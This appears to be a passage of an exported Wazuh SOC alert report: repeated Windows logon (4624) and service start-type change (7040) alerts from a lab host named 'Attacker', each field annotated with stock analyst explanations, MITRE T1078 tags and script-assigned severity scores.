Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:55:16.6963122Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43511
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:39.016+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:39.016+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533899.221663
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:40.0278198Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2945
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11352
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Windows Modules Installer
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  TrustedInstaller
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:39.329+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:39.329+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533899.223443
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:35.6633235Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43515
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  6624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:43.485+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:43.485+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533903.230779
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:54:27.8966188Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2949
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10448
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from auto start to demand start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Windows Modules Installer
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  TrustedInstaller
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:43.823+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:43.823+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533903.232559
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:54:42.4352316Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2950
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11352
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Windows Modules Installer
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  TrustedInstaller
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.002+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.002+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.234339
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:37.9843227Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43519
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9432
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

